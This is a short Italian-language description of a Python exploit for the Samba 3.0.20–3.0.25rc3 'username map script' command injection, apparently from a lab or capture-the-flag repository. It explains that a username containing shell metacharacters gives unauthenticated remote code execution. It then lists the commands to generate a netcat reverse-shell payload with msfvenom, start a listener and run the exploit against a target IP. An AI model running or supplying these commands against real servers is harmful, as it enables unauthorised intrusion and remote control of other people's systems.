
Exploit in Python per Samba 3.0.20-3.0.25rc3 'username map script' command injection, che fornisce esecuzione remota di codice non autenticata e reverse shell.
Questo modulo sfrutta una vulnerabilità di esecuzione di comandi nelle versioni di Samba dalla 3.0.20 alla 3.0.25rc3 quando viene utilizzata l'opzione di configurazione non predefinita "username map script". Specificando un nome utente contenente metacaratteri di shell, gli attaccanti possono eseguire comandi arbitrari. Non è necessaria alcuna autenticazione per sfruttare questa vulnerabilità, poiché questa opzione viene utilizzata per mappare i nomi utente prima dell'autenticazione!
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.56 LPORT=5555 -f python
nc -nlvp 5555
python3 smbusermap.py <Target IP>
